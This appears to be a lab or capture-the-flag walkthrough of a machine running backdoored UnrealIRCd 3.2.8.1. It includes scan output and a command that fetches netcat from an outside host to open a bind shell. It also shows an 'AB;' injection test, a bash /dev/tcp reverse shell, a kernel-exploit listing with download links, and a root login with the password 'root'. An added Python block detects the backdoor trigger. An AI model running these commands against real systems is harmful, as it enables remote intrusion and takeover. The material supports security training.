SunsetNoontide

6667/tcp open   irc           UnrealIRCd (Admin email example@example.com)
6697/tcp open   irc           UnrealIRCd (Admin email example@example.com)
8067/tcp open   irc           UnrealIRCd (Admin email example@example.com)

irc.foonet.com

6667/tcp  open     irc           syn-ack
6697/tcp  open     ircs-u        syn-ack
8067/tcp  open     infi-async    syn-ack

```
:irc.foonet.com 002 unko123 :Your host is irc.foonet.com, running version Unreal3.2.8.1
:irc.foonet.com 003 unko123 :This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
:irc.foonet.com 004 unko123 irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.foonet.com 005 unko123 UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:irc.foonet.com 005 unko123 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:irc.foonet.com 005 unko123 EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.foonet.com 251 unko123 :There are 1 users and 0 invisible on 1 servers
:irc.foonet.com 255 unko123 :I have 1 clients and 0 servers
:irc.foonet.com 265 unko123 :Current Local Users: 1  Max: 1
:irc.foonet.com 266 unko123 :Current Global Users: 1  Max: 1
:irc.foonet.com 422 unko123 :MOTD File is missing
:irc.foonet.com 256 unko123 :Administrative info about irc.foonet.com
:irc.foonet.com 257 unko123 :Bob Smith
:irc.foonet.com 258 unko123 :bob
:irc.foonet.com 258 unko123 :widely@used.name
```

Used a technique of

Full nmap scanning shows there's port 8067

it's looking up the host name?

Unreal3.2.8.1

https://www.infosecmatter.com/nmap-nse-library/?nse=irc-unrealircd-backdoor

```
nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' 10.129.1.108
```

```
echo "AB; ping -c 1 192.168.49.130" | nc 192.168.130.120 8067
```

```
tcpdump -i tun1 icmp -v
```

Confirmed that we can do command execution.

```
echo "AB; bash -c 'bash -i >& /dev/tcp/192.168.49.130/9001 0>&1'" | nc 192.168.130.120 8067
```

Explanation: the shell that runs the injected command may not be bash, so we invoke bash explicitly with "bash -c" before executing the command.
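A defender-side check for what these notes show, as an added example (not part of the original notes): it reads the server version from the 002/004 replies and flags plaintext client payloads on the IRC ports that begin with the `AB` prefix used in the commands above. The function names, the event tuple layout and the sample traffic are assumptions constructed for illustration; a matching version string only marks a host for checking.

```python
import re

KNOWN_BAD = {"Unreal3.2.8.1"}      # release shown in the page's 002/004 replies
IRC_PORTS = {6667, 6697, 8067}     # listeners found by the page's scan

def server_version(numerics):
    """Return the version from RPL_MYINFO (004), else from RPL_YOURHOST (002)."""
    fallback = None
    for line in numerics:
        parts = line.lstrip(":").split()
        if len(parts) >= 5 and parts[1] == "004":
            return parts[4]            # :srv 004 nick srv <version> ...
        m = re.search(r" 002 .*running version (\S+)", line)
        if m:
            fallback = m.group(1)
    return fallback

def find_backdoor_triggers(events):
    """Flag client-to-server payloads on IRC ports that begin with 'AB'."""
    # Assumption: no legitimate client command on this network starts with AB.
    # Only plaintext is visible; a TLS listener needs server-side logging.
    hits = []
    for src, dport, payload in events:
        if dport in IRC_PORTS and payload.startswith(b"AB"):
            cmd = payload[2:].lstrip(b"; ").rstrip(b"\r\n")
            hits.append({"src": src, "port": dport,
                         "command": cmd.decode("latin-1")})
    return hits

# Server replies as captured on the page.
SAMPLE_NUMERICS = [
    ":irc.foonet.com 002 unko123 :Your host is irc.foonet.com, running version Unreal3.2.8.1",
    ":irc.foonet.com 004 unko123 irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj",
]
# Constructed traffic: (source address, destination port, first payload).
SAMPLE_EVENTS = [
    ("198.51.100.7", 6667, b"NICK alice\r\n"),
    ("198.51.100.7", 6667, b"USER alice 0 * :Alice\r\n"),
    ("198.51.100.9", 8067, b"AB; ping -c 1 198.51.100.9\n"),
    ("198.51.100.9", 22, b"ABCD"),
]

def triage(numerics, events):
    version = server_version(numerics)
    return {"version": version, "known_bad": version in KNOWN_BAD,
            "triggers": find_backdoor_triggers(events)}

if __name__ == "__main__":
    print(triage(SAMPLE_NUMERICS, SAMPLE_EVENTS))
```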

got a reverse shell:

Priv Esc:

```
[+] [CVE-2019-13272] PTRACE_TRACEME

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   Exposure: highly probable
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
   Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
   Comments: Requires an active PolKit agent.
```

I tried this exploit but it didn't work. Looks like it's a Metasploit module.

Then I tried to log in to root with password root and got in!
